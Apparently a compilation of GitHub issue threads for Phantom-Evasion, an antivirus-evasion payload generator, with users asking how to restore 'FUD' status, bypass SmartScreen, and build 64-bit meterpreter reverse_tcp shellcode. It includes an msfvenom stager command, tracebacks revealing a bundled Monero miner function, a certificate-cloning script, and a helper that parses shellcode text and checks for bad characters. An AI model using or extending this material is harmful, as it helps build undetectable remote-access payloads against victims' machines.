Then clearly ask the user whether they agree to this or not. If they agree, great, if they don't, don't call the function and related operations in the Phantom_lib.py file and simply provide the core functionality of Phantom-Evasion as is.

Just my two cents.

[Not an Issue]Help understanding source Code

First of all, yes I know this isn't an issue and this probably isn't the right place for this.
So if anyone can help, I would really appreciate it, otherwise just ignore.

I'm trying to modify the source code for myself to test new things.
Therefore I used the HeapAlloc module, ran the python script, decoded the source.c file and removed all Junkcode and WinEvasion Code.

This is the code I ended up with:
Source.c

Question:

  1. What line/command actually executes the shellcode?
  2. What are the smaller shellcodes about?

Script no longer FUD.

Even when using alternative payloads to msfvenom, this payload is now detectable by AV software.

Method for bypass?

Running into this while attempting to download the payload via a browser:
[screenshot]

Does anyone know of a method to bypass this?

I thought signing the application would bypass it, but the error still outputs "Unknown Publisher".
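Added example (my code, not Phantom-Evasion's) of what the tool's "certificate spoofing" signing step amounts to, written against the `cryptography` library rather than the pyOpenSSL calls visible in the first traceback on this page (`cert.set_notBefore(x509.get_notBefore())`). A "spoofed" certificate copies the subject, issuer, serial and validity window of a real site's leaf certificate into a brand-new self-signed certificate with a fresh key. The copied strings are what a casual inspection shows; the signature is what Authenticode and SmartScreen verify, and it validates under no trusted key, which is why the signed binary in the post above still shows "Unknown Publisher". The target leaf and its CA below are constructed stand-ins for the certificate a real run would fetch from the host given at the spoofing-target prompt.

```python
import datetime

from cryptography import x509
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.x509.oid import NameOID


def _name(cn: str, org: str) -> x509.Name:
    return x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, cn),
                      x509.NameAttribute(NameOID.ORGANIZATION_NAME, org)])


def _validity(cert):
    # not_valid_before_utc exists from cryptography 42; older versions only have the naive form
    try:
        return cert.not_valid_before_utc, cert.not_valid_after_utc
    except AttributeError:
        return cert.not_valid_before, cert.not_valid_after


def make_target_leaf():
    """Constructed stand-in for the leaf fetched from the spoofing target, plus its CA's public key."""
    ca_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    leaf_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    start = datetime.datetime(2019, 1, 1)
    leaf = (x509.CertificateBuilder()
            .subject_name(_name("www.example.com", "Example Corp"))
            .issuer_name(_name("Example Public CA", "Example Trust Services"))
            .public_key(leaf_key.public_key())
            .serial_number(x509.random_serial_number())
            .not_valid_before(start)
            .not_valid_after(start + datetime.timedelta(days=365))
            .sign(ca_key, hashes.SHA256()))
    return leaf, ca_key.public_key()


def clone_certificate(target):
    """Copy every visible field of `target` into a self-signed cert over a brand-new key."""
    new_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    nvb, nva = _validity(target)
    clone = (x509.CertificateBuilder()
             .subject_name(target.subject)
             .issuer_name(target.issuer)        # same issuer string, but nobody issued it
             .public_key(new_key.public_key())
             .serial_number(target.serial_number)
             .not_valid_before(nvb)
             .not_valid_after(nva)
             .sign(new_key, hashes.SHA256()))   # signed with our own key, not the CA's
    return clone, new_key


def signed_by(cert, issuer_public_key) -> bool:
    """True if the certificate's signature verifies under issuer_public_key (RSA PKCS#1 v1.5)."""
    try:
        issuer_public_key.verify(cert.signature, cert.tbs_certificate_bytes,
                                 padding.PKCS1v15(), cert.signature_hash_algorithm)
        return True
    except InvalidSignature:
        return False


if __name__ == "__main__":
    target, ca_pub = make_target_leaf()
    clone, _ = clone_certificate(target)
    print(clone.subject == target.subject, clone.serial_number == target.serial_number)
    print(signed_by(target, ca_pub), signed_by(clone, ca_pub))   # True False
```

A code-signing verifier walks from the signer certificate up to a trusted root using the signature, not the issuer name, so the clone is rejected at the first hop; the same check is what a reviewer of a signed binary should run rather than reading the subject field.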

Shellcode

This is a fresh new summary of this old issue.

A lot of people had issues with creating custom shellcode and using it.

What is the goal:
Create 64-bit shellcode (reverse_tcp) and use it with Phantom-Evasion

Previous tries:

  • Veil doesn't support 64-bit (32-bit didn't work for me)
  • Using msfvenom (connected on 32-bit, but instantly died. 64-bit not at all)
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f c -b "/x00/x0a/x0d" > outfile
    (used windows/x64/meterpreter/reverse_tcp of course for 64-bit in listener and generator)

Question:
Can anyone who got this working post a detailed list of the steps they took to achieve this?
Something like:

  • What shellcode generator? (e.g. Veil, msfvenom, etc.)
  • What encoders for the shellcode? (e.g. None, Xor, etc.)
  • What badchars?
  • What modules? (e.g. HeapAlloc, VirtualAlloc, etc.)
  • What encoders in Phantom-Evasion?
  • etc.

Maybe @oddcod3 already tested this!
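Added example (my code, not Phantom-Evasion's) serving this post and the earlier "encoding problem" one: a strict parser for shellcode typed or pasted as "\xNN" text, which is the input both feed to the tool. The tool's Python 2 code decoded that text with 'string-escape', so anything that is not a valid escape either silently becomes the wrong byte or raises "invalid \x escape": the tool's own prompt example ends in "\a6", and the badchar list quoted above is written with forward slashes ("/x00") where msfvenom's -b option expects backslashes. This parser accepts only \xNN (tolerating the decoration msfvenom -f c wraps around the bytes), reports the exact offset of anything else, and checks the result against a badchar list so a stager that "connects and instantly dies" can be ruled in or out on that axis first. All inputs below are constructed.

```python
import re

_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
# Whitespace, quotes, semicolons and the msfvenom -f c array header are noise, not bytes.
_DECORATION = re.compile(r'[\s";]|unsigned char \w+\[\] =')


def parse_shellcode(text: str) -> bytes:
    """Turn '\\xfc\\x48...' text (raw or msfvenom -f c output) into bytes.

    Raises ValueError naming the offset of the first thing that is not a \\xNN escape,
    instead of guessing what '\\a6' or '/x00' was meant to be.
    """
    cleaned = _DECORATION.sub("", text)
    out, pos = bytearray(), 0
    while pos < len(cleaned):
        m = _ESCAPE.match(cleaned, pos)
        if m is None:
            raise ValueError(f"not a \\xNN escape at offset {pos}: {cleaned[pos:pos + 4]!r}")
        out.append(int(m.group(1), 16))
        pos = m.end()
    return bytes(out)


def validate(text: str):
    """None if the text parses cleanly, otherwise the parser's error message."""
    try:
        parse_shellcode(text)
    except ValueError as e:
        return str(e)
    return None


def find_badchars(shellcode: bytes, badchars: bytes):
    """[(offset, byte), ...] for every badchar byte present in the shellcode."""
    return [(i, b) for i, b in enumerate(shellcode) if b in badchars]


if __name__ == "__main__":
    # Constructed inputs: a clean buffer, the tool's prompt example, and the slash form.
    good = r"\xfc\x48\x83\xe4\xf0"
    print(parse_shellcode(good).hex())
    print(validate(r"\xff\xbc\xb9\a6"))
    print(validate("/x00/x0a/x0d"))
    print(find_badchars(parse_shellcode(good) + b"\x00\x0a", parse_shellcode(r"\x00\x0a\x0d")))
```

Run the badchar check on the bytes the stager will actually execute, i.e. after any Phantom-Evasion encoding layer has been removed, since a byte the loader cannot tolerate matters only where the loader sees it.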

Wine Environment Check fails after second run

Hi All,

Spun up a brand new Kali install:

Linux 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64 GNU/Linux

Then performed the following actions to spin up the environment:

git clone https://github.com/oddcod3/Phantom-Evasion.git
cd Phantom-Evasion
chmod u+x phantom-evasion.py
python3 phantom-evasion.py

This worked fine, I generated a payload, seems to work.
Gracefully quit the application.

Upon attempting to relaunch the application I'm hitting the following error at the Wine Environment Check:

[>] Python Version: 3.6.8

[>] Kali-Rolling Detected!!

[>] Checking dependencies:

[>] Package libc6-dev-i386               [Found]

[+] apktool                              [Found]
[+] apktool.jar file                     [Found]
[+] gcc                                  [Found]
[+] mingw-w64                            [Found]
[+] pyinstaller                          [Found]
[+] apksigner                            [Found]
[+] metasploit-framework                 [Found]
[+] strip                                [Found]
[+] osslsigncode                         [Found]
[+] Wine Environment check
Traceback (most recent call last):
  File "phantom-evasion.py", line 709, in <module>
    Phantom_lib.dependencies_checker()
  File "Setup/Phantom_lib.py", line 296, in dependencies_checker
    kali_parrot_isready()
  File "Setup/Phantom_lib.py", line 204, in kali_parrot_isready
    wine_check()
  File "Setup/Phantom_lib.py", line 510, in wine_check
    if "cannot find" in py_check:
TypeError: a bytes-like object is required, not 'str'

Can't seem to get past this and not sure what the actual issue here is.
Any help would be appreciated.

Cheers,

Unable to install phantom-evasion

Hello,

I got this error in the middle of the installation process. I'm running Debian 9; the Wine Python version is 3.4.

[*] Trying to autoinstall:

Reading package lists... Done
Building dependency tree
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
libc6-dev-i386 : Depends: libc6-i386 (= 2.24-11+deb9u3) but 2.27-6 is to be installed
Depends: libc6-dev (= 2.24-11+deb9u3) but 2.27-6 is to be installed
Recommends: gcc-multilib but it is not going to be installed
E: Unable to correct problems, you have held broken packages.
[+] apktool [Found]
[+] apktool.jar file [Found]
[+] gcc [Found]
[+] mingw-w64 [Found]
[+] pyinstaller [Found]
[+] apksigner [Found]
[+] openssl [Found]
[+] strip [Found]
[+] wine [Found]
[+] Wine Environment check
[Wine] Python Found
[Wine] Pyinstaller Found
[>] Metasploit-Framework [Found]

[>] Completed!!

[DISCLAIMER]:Phantom-Evasion is intended to be used for legal security
purposes only any other use is not under the responsibility of the developer

[+] Developed by: Diego Cornacchini

[+] GITHUB: https://github.com/oddcod3

[+] VERSION: 1.2

[+] MODULES: 24

[+] NEW FEATURES: Pure C meterpreter stager,Persistence modules

Traceback (most recent call last):
  File "./phantom-evasion.py", line 439, in <module>
    Phantom_lib.xmr_miner()
  File "Setup/Phantom_lib.py", line 614, in xmr_miner
    subprocess.call(['tmux','send-keys','-t','phantom-miner','"\x03"','C-m'], stdout=open(os.devnull,'wb'), stderr=open(os.devnull,'wb'))
  File "/usr/lib/python2.7/subprocess.py", line 172, in call
    return Popen(*popenargs, **kwargs).wait()
  File "/usr/lib/python2.7/subprocess.py", line 394, in __init__
    errread, errwrite)
  File "/usr/lib/python2.7/subprocess.py", line 1047, in _execute_child
    raise child_exception
OSError: [Errno 2] No such file or directory

Support OSX

It is possible; I have done it on my own copy. For example, mingw-w64 and osslsigncode can be installed with brew, and you can detect OSX via platform.system() == "Darwin".

VirtualAlloc NoDirectCall LL/GPA crashes on latest version

steps to reproduce:

  1. Windows Modules
  2. Windows Shellcode Injection VirtualAlloc NoDirectCall LL/GPA
  3. Payload: windows/x64/meterpreter/reverse_https
  4. Encoder: x64/xor + Triple Multibyte-key xor
  5. Add multiple processes behaviour? y, 3

result:

[screenshot]
